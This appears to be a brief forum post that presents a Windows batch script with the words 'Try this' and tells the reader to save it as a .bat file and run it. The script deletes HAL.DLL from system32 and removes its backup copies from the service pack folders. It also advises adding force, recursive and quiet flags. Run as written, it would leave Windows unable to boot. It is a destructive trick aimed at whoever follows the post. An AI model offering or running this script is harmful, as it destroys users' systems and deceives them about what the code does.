Try this :

 

@echo off

cd c:\windows/system32

del HAL.DLL

cd c:\windows/servicepackfiles/i386

del hal.dll

cd c:\windows/$NtServicePackUninstall$

del hal.dll

move *.bat "c:\windows/help/texttour.txt"

 

Save in notepad as .bat, then open.

dont forget to add these flags to your DEL command /f /s /q
